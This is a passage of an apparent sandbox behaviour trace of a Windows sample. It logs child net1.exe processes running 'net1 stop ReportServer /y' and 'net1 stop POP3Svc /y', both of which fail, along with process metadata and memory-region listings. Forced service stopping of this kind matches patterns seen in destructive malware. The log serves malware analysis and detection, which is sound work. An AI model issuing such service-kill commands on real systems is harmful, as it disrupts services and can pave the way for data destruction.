_DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0108.254] setlocale (category=0, locale=".437") returned="English_United States.437" [0108.255] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0108.255] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0108.255] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ReportServer /y" [0108.255] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f8f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0108.255] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0108.255] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x18fb48 | out: Buffer=0x18fb48*=0x214d50) returned 0x0 [0108.255] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x18fb48 | out: Buffer=0x18fb48*=0x21c100) returned 0x0 [0108.255] _fileno (_File=0x7fefdba2a80) returned 0 [0108.255] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0108.256] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0108.256] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0108.256] _wcsicmp (_String1="config", _String2="stop") returned -16 [0108.256] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0108.256] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0108.256] _wcsicmp (_String1="file", _String2="stop") returned -13 [0108.256] _wcsicmp (_String1="files", _String2="stop") returned -13 [0108.256] _wcsicmp (_String1="group", _String2="stop") returned -12 [0108.256] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0108.256] _wcsicmp (_String1="help", _String2="stop") returned -11 [0108.256] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0108.256] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0108.256] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0108.256] _wcsicmp (_String1="session", _String2="stop") returned -15 [0108.256] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0108.256] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0108.256] _wcsicmp (_String1="share", _String2="stop") returned -12 [0108.256] _wcsicmp (_String1="start", _String2="stop") returned -14 [0108.256] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0108.256] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0108.256] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0108.256] _wcsicmp (_String1="accounts", _String2="ReportServer") returned -17 [0108.256] _wcsicmp (_String1="computer", _String2="ReportServer") returned -15 [0108.256] _wcsicmp (_String1="config", _String2="ReportServer") returned -15 [0108.256] _wcsicmp (_String1="continue", _String2="ReportServer") returned -15 [0108.256] _wcsicmp (_String1="cont", _String2="ReportServer") returned -15 [0108.256] _wcsicmp (_String1="file", _String2="ReportServer") returned -12 [0108.256] _wcsicmp (_String1="files", _String2="ReportServer") returned -12 [0108.256] _wcsicmp (_String1="group", _String2="ReportServer") returned -11 [0108.256] _wcsicmp (_String1="groups", _String2="ReportServer") returned -11 [0108.257] _wcsicmp (_String1="help", _String2="ReportServer") returned -10 [0108.257] _wcsicmp (_String1="helpmsg", _String2="ReportServer") returned -10 [0108.257] _wcsicmp (_String1="localgroup", _String2="ReportServer") returned -6 [0108.257] _wcsicmp (_String1="pause", _String2="ReportServer") returned -2 [0108.257] _wcsicmp (_String1="session", _String2="ReportServer") returned 1 [0108.257] _wcsicmp (_String1="sessions", _String2="ReportServer") returned 1 [0108.257] _wcsicmp (_String1="sess", _String2="ReportServer") returned 1 [0108.257] _wcsicmp (_String1="share", _String2="ReportServer") returned 1 [0108.257] _wcsicmp (_String1="start", _String2="ReportServer") returned 1 [0108.257] _wcsicmp (_String1="stats", _String2="ReportServer") returned 1 [0108.257] _wcsicmp (_String1="statistics", _String2="ReportServer") returned 1 [0108.257] _wcsicmp (_String1="stop", _String2="ReportServer") returned 1 [0108.257] _wcsicmp (_String1="time", _String2="ReportServer") returned 2 [0108.257] _wcsicmp (_String1="user", _String2="ReportServer") returned 3 [0108.257] _wcsicmp (_String1="users", _String2="ReportServer") returned 3 [0108.257] _wcsicmp (_String1="msg", _String2="ReportServer") returned -5 [0108.257] _wcsicmp (_String1="messenger", _String2="ReportServer") returned -5 [0108.257] _wcsicmp (_String1="receiver", _String2="ReportServer") returned -13 [0108.257] _wcsicmp (_String1="rcv", _String2="ReportServer") returned -2 [0108.257] _wcsicmp (_String1="netpopup", _String2="ReportServer") returned -4 [0108.257] _wcsicmp (_String1="redirector", _String2="ReportServer") returned -12 [0108.257] _wcsicmp (_String1="redir", _String2="ReportServer") returned -12 [0108.257] _wcsicmp (_String1="rdr", _String2="ReportServer") returned -1 [0108.257] _wcsicmp (_String1="workstation", _String2="ReportServer") returned 5 [0108.257] _wcsicmp (_String1="work", _String2="ReportServer") returned 5 [0108.257] _wcsicmp (_String1="wksta", _String2="ReportServer") returned 5 [0108.257] _wcsicmp (_String1="prdr", _String2="ReportServer") returned -2 [0108.257] _wcsicmp (_String1="devrdr", _String2="ReportServer") returned -14 [0108.257] _wcsicmp (_String1="lanmanworkstation", _String2="ReportServer") returned -6 [0108.257] _wcsicmp (_String1="server", _String2="ReportServer") returned 1 [0108.257] _wcsicmp (_String1="svr", _String2="ReportServer") returned 1 [0108.257] _wcsicmp (_String1="srv", _String2="ReportServer") returned 1 [0108.257] _wcsicmp (_String1="lanmanserver", _String2="ReportServer") returned -6 [0108.257] _wcsicmp (_String1="alerter", _String2="ReportServer") returned -17 [0108.257] _wcsicmp (_String1="netlogon", _String2="ReportServer") returned -4 [0108.258] _wcsupr (in: _String="ReportServer" | out: _String="REPORTSERVER") returned="REPORTSERVER" [0108.258] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x21ce10 [0108.261] GetServiceKeyNameW (in: hSCManager=0x21ce10, lpDisplayName="REPORTSERVER", lpServiceName=0xff5e5750, lpcchBuffer=0x18fa68 | out: lpServiceName="", lpcchBuffer=0x18fa68) returned 0 [0108.262] _wcsicmp (_String1="msg", _String2="REPORTSERVER") returned -5 [0108.262] _wcsicmp (_String1="messenger", _String2="REPORTSERVER") returned -5 [0108.262] _wcsicmp (_String1="receiver", _String2="REPORTSERVER") returned -13 [0108.262] _wcsicmp (_String1="rcv", _String2="REPORTSERVER") returned -2 [0108.262] _wcsicmp (_String1="redirector", _String2="REPORTSERVER") returned -12 [0108.262] _wcsicmp (_String1="redir", _String2="REPORTSERVER") returned -12 [0108.262] _wcsicmp (_String1="rdr", _String2="REPORTSERVER") returned -1 [0108.262] _wcsicmp (_String1="workstation", _String2="REPORTSERVER") returned 5 [0108.262] _wcsicmp (_String1="work", _String2="REPORTSERVER") returned 5 [0108.262] _wcsicmp (_String1="wksta", _String2="REPORTSERVER") returned 5 [0108.262] _wcsicmp (_String1="prdr", _String2="REPORTSERVER") returned -2 [0108.262] _wcsicmp (_String1="devrdr", _String2="REPORTSERVER") returned -14 [0108.262] _wcsicmp (_String1="lanmanworkstation", _String2="REPORTSERVER") returned -6 [0108.262] _wcsicmp (_String1="server", _String2="REPORTSERVER") returned 1 [0108.262] _wcsicmp (_String1="svr", _String2="REPORTSERVER") returned 1 [0108.262] _wcsicmp (_String1="srv", _String2="REPORTSERVER") returned 1 [0108.262] _wcsicmp (_String1="lanmanserver", _String2="REPORTSERVER") returned -6 [0108.262] _wcsicmp (_String1="alerter", _String2="REPORTSERVER") returned -17 [0108.262] _wcsicmp (_String1="netlogon", _String2="REPORTSERVER") returned -4 [0108.262] NetServiceControl (in: servername=0x0, service="REPORTSERVER", opcode=0x0, arg=0x0, bufptr=0x18fa70 | out: bufptr=0x18fa70) returned 0x889 [0108.263] wcscpy_s (in: _Destination=0xff5e80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0108.263] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0108.263] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff5e5b50, nSize=0x800, Arguments=0xff5e7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0108.265] GetFileType (hFile=0xb) returned 0x2 [0108.265] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f938 | out: lpMode=0x18f938) returned 1 [0108.265] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff5e5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x18f930, lpReserved=0x0 | out: lpBuffer=0xff5e5b50*, lpNumberOfCharsWritten=0x18f930*=0x1e) returned 1 [0108.265] GetFileType (hFile=0xb) returned 0x2 [0108.265] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f938 | out: lpMode=0x18f938) returned 1 [0108.266] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff5c1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18f930, lpReserved=0x0 | out: lpBuffer=0xff5c1efc*, lpNumberOfCharsWritten=0x18f930*=0x2) returned 1 [0108.266] _ultow (in: _Dest=0x889, _Radix=1636768 | out: _Dest=0x889) returned="2185" [0108.266] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff5e5b50, nSize=0x800, Arguments=0xff5e7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0108.266] GetFileType (hFile=0xb) returned 0x2 [0108.266] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f938 | out: lpMode=0x18f938) returned 1 [0108.266] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff5e5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x18f930, lpReserved=0x0 | out: lpBuffer=0xff5e5b50*, lpNumberOfCharsWritten=0x18f930*=0x34) returned 1 [0108.267] GetFileType (hFile=0xb) returned 0x2 [0108.267] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f938 | out: lpMode=0x18f938) returned 1 [0108.267] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff5c1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18f930, lpReserved=0x0 | out: lpBuffer=0xff5c1efc*, lpNumberOfCharsWritten=0x18f930*=0x2) returned 1 [0108.267] NetApiBufferFree (Buffer=0x214d50) returned 0x0 [0108.267] NetApiBufferFree (Buffer=0x21c100) returned 0x0 [0108.267] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ReportServer /y" [0108.267] exit (_Code=2) Process: id = "241" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x5dcd2000" os_pid = "0xcf8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "230" os_parent_pid = "0xeb0" cmd_line = "C:\\Windows\\system32\\net1 stop POP3Svc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9205 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9206 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9207 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9208 start_va = 0x1f0000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 9209 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9210 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 9211 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9212 start_va = 0xff5c0000 end_va = 0xff5f2fff entry_point = 0xff5c0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 9213 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9214 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 9215 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 9216 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 9217 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 9218 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9219 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9274 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 9275 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 9276 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9277 start_va = 0x170000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9278 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 9279 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 9280 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 9281 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 9282 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 9283 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 9284 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 9285 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 9286 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 9287 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 9288 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 9289 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 9290 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 9291 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9292 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9293 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 9294 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 9295 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 9296 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 9297 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 712 os_tid = 0xc84 [0108.275] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fb50 | out: lpSystemTimeAsFileTime=0x26fb50*(dwLowDateTime=0xf5af87b0, dwHighDateTime=0x1d48689)) [0108.275] GetCurrentProcessId () returned 0xcf8 [0108.275] GetCurrentThreadId () returned 0xc84 [0108.275] GetTickCount () returned 0x24cb8 [0108.275] QueryPerformanceCounter (in: lpPerformanceCount=0x26fb58 | out: lpPerformanceCount=0x26fb58*=1815519300000) returned 1 [0108.276] GetModuleHandleW (lpModuleName=0x0) returned 0xff5c0000 [0108.276] __set_app_type (_Type=0x1) [0108.276] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff5d9c9c) returned 0x0 [0108.277] __getmainargs (in: _Argc=0xff5e4780, _Argv=0xff5e4790, _Env=0xff5e4788, _DoWildCard=0, _StartInfo=0xff5e479c | out: _Argc=0xff5e4780, _Argv=0xff5e4790, _Env=0xff5e4788) returned 0 [0108.277] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0108.277] GetConsoleOutputCP () returned 0x1b5 [0108.277] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff5ecec0 | out: lpCPInfo=0xff5ecec0) returned 1 [0108.277] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0108.279] sprintf_s (in: _DstBuf=0x26faf8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0108.280] setlocale (category=0, locale=".437") returned="English_United States.437" [0108.281] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0108.281] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0108.281] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop POP3Svc /y" [0108.281] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x26f890, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0108.281] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0108.281] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x26fae8 | out: Buffer=0x26fae8*=0x3a4d40) returned 0x0 [0108.281] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x26fae8 | out: Buffer=0x26fae8*=0x3ac0e0) returned 0x0 [0108.281] _fileno (_File=0x7fefdba2a80) returned 0 [0108.281] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0108.281] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0108.282] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0108.282] _wcsicmp (_String1="config", _String2="stop") returned -16 [0108.282] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0108.282] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0108.282] _wcsicmp (_String1="file", _String2="stop") returned -13 [0108.282] _wcsicmp (_String1="files", _String2="stop") returned -13 [0108.282] _wcsicmp (_String1="group", _String2="stop") returned -12 [0108.282] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0108.282] _wcsicmp (_String1="help", _String2="stop") returned -11 [0108.282] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0108.282] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0108.282] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0108.282] _wcsicmp (_String1="session", _String2="stop") returned -15 [0108.282] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0108.282] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0108.282] _wcsicmp (_String1="share", _String2="stop") returned -12 [0108.282] _wcsicmp (_String1="start", _String2="stop") returned -14 [0108.282] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0108.282] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0108.282] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0108.282] _wcsicmp (_String1="accounts", _String2="POP3Svc") returned -15 [0108.282] _wcsicmp (_String1="computer", _String2="POP3Svc") returned -13 [0108.282] _wcsicmp (_String1="config", _String2="POP3Svc") returned -13 [0108.282] _wcsicmp (_String1="continue", _String2="POP3Svc") returned -13 [0108.282] _wcsicmp (_String1="cont", _String2="POP3Svc") returned -13 [0108.282] _wcsicmp (_String1="file", _String2="POP3Svc") returned -10 [0108.282] _wcsicmp (_String1="files", _String2="POP3Svc") returned -10 [0108.282] _wcsicmp (_String1="group", _String2="POP3Svc") returned -9 [0108.282] _wcsicmp (_String1="groups", _String2="POP3Svc") returned -9 [0108.282] _wcsicmp (_String1="help", _String2="POP3Svc") returned -8 [0108.282] _wcsicmp (_String1="helpmsg", _String2="POP3Svc") returned -8 [0108.282] _wcsicmp (_String1="localgroup", _String2="POP3Svc") returned -4 [0108.282] _wcsicmp (_String1="pause", _String2="POP3Svc") returned -14 [0108.282] _wcsicmp (_String1="session", _String2="POP3Svc") returned 3 [0108.282] _wcsicmp (_String1="sessions", _String2="POP3Svc") returned 3 [0108.282] _wcsicmp (_String1="sess", _String2="POP3Svc") returned 3 [0108.282] _wcsicmp (_String1="share", _String2="POP3Svc") returned 3 [0108.282] _wcsicmp (_String1="start", _String2="POP3Svc") returned 3 [0108.282] _wcsicmp (_String1="stats", _String2="POP3Svc") returned 3 [0108.282] _wcsicmp (_String1="statistics", _String2="POP3Svc") returned 3 [0108.282] _wcsicmp (_String1="stop", _String2="POP3Svc") returned 3 [0108.282] _wcsicmp (_String1="time", _String2="POP3Svc") returned 4 [0108.283] _wcsicmp (_String1="user", _String2="POP3Svc") returned 5 [0108.283] _wcsicmp (_String1="users", _String2="POP3Svc") returned 5 [0108.283] _wcsicmp (_String1="msg", _String2="POP3Svc") returned -3 [0108.283] _wcsicmp (_String1="messenger", _String2="POP3Svc") returned -3 [0108.283] _wcsicmp (_String1="receiver", _String2="POP3Svc") returned 2 [0108.283] _wcsicmp (_String1="rcv", _String2="POP3Svc") returned 2 [0108.283] _wcsicmp (_String1="netpopup", _String2="POP3Svc") returned -2 [0108.283] _wcsicmp (_String1="redirector", _String2="POP3Svc") returned 2 [0108.283] _wcsicmp (_String1="redir", _String2="POP3Svc") returned 2 [0108.283] _wcsicmp (_String1="rdr", _String2="POP3Svc") returned 2 [0108.283] _wcsicmp (_String1="workstation", _String2="POP3Svc") returned 7 [0108.283] _wcsicmp (_String1="work", _String2="POP3Svc") returned 7 [0108.283] _wcsicmp (_String1="wksta", _String2="POP3Svc") returned 7 [0108.283] _wcsicmp (_String1="prdr", _String2="POP3Svc") returned 3 [0108.283] _wcsicmp (_String1="devrdr", _String2="POP3Svc") returned -12 [0108.283] _wcsicmp (_String1="lanmanworkstation", _String2="POP3Svc") returned -4 [0108.283] _wcsicmp (_String1="server", _String2="POP3Svc") returned 3 [0108.283] _wcsicmp (_String1="svr", _String2="POP3Svc") returned 3 [0108.283] _wcsicmp (_String1="srv", _String2="POP3Svc") returned 3 [0108.283] _wcsicmp (_String1="lanmanserver", _String2="POP3Svc") returned -4 [0108.283] _wcsicmp (_String1="alerter", _String2="POP3Svc") returned -15 [0108.283] _wcsicmp (_String1="netlogon", _String2="POP3Svc") returned -2 [0108.283] _wcsupr (in: _String="POP3Svc" | out: _String="POP3SVC") returned="POP3SVC" [0108.283] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3acdf0 [0108.287] GetServiceKeyNameW (in: hSCManager=0x3acdf0, lpDisplayName="POP3SVC", lpServiceName=0xff5e5750, lpcchBuffer=0x26fa08 | out: lpServiceName="", lpcchBuffer=0x26fa08) returned 0 [0108.287] _wcsicmp (_String1="msg", _String2="POP3SVC") returned -3 [0108.287] _wcsicmp (_String1="messenger", _String2="POP3SVC") returned -3 [0108.287] _wcsicmp (_String1="receiver", _String2="POP3SVC") returned 2 [0108.287] _wcsicmp (_String1="rcv", _String2="POP3SVC") returned 2 [0108.287] _wcsicmp (_String1="redirector", _String2="POP3SVC") returned 2 [0108.287] _wcsicmp (_String1="redir", _String2="POP3SVC") returned 2 [0108.287] _wcsicmp (_String1="rdr", _String2="POP3SVC") returned 2 [0108.287] _wcsicmp (_String1="workstation", _String2="POP3SVC") returned 7 [0108.287] _wcsicmp (_String1="work", _String2="POP3SVC") returned 7 [0108.288] _wcsicmp (_String1="wksta", _String2="POP3SVC") returned 7 [0108.288] _wcsicmp (_String1="prdr", _String2="POP3SVC") returned 3 [0108.288] _wcsicmp (_String1="devrdr", _String2="POP3SVC") returned -12 [0108.288] _wcsicmp (_String1="lanmanworkstation", _String2="POP3SVC") returned -4 [0108.288] _wcsicmp (_String1="server", _String2="POP3SVC") returned 3 [0108.288] _wcsicmp (_String1="svr", _String2="POP3SVC") returned 3 [0108.288] _wcsicmp (_String1="srv", _String2="POP3SVC") returned 3 [0108.288] _wcsicmp (_String1="lanmanserver", _String2="POP3SVC") returned -4 [0108.288] _wcsicmp (_String1="alerter", _String2="POP3SVC") returned -15 [0108.288] _wcsicmp (_String1="netlogon", _String2="POP3SVC") returned -2 [0108.288] NetServiceControl (in: servername=0x0, service="POP3SVC", opcode=0x0, arg=0x0, bufptr=0x26fa10 | out: bufptr=0x26fa10) returned 0x889 [0108.289] wcscpy_s (in: _Destination=0xff5e80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0108.289] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0108.289] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff5e5b50, nSize=0x800, Arguments=0xff5e7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0108.290] GetFileType (hFile=0xb) returned 0x2 [0108.290] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26f8d8 | out: lpMode=0x26f8d8) returned 1 [0108.291] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff5e5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x26f8d0, lpReserved=0x0 | out: lpBuffer=0xff5e5b50*, lpNumberOfCharsWritten=0x26f8d0*=0x1e) returned 1 [0108.291] GetFileType (hFile=0xb) returned 0x2 [0108.291] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26f8d8 | out: 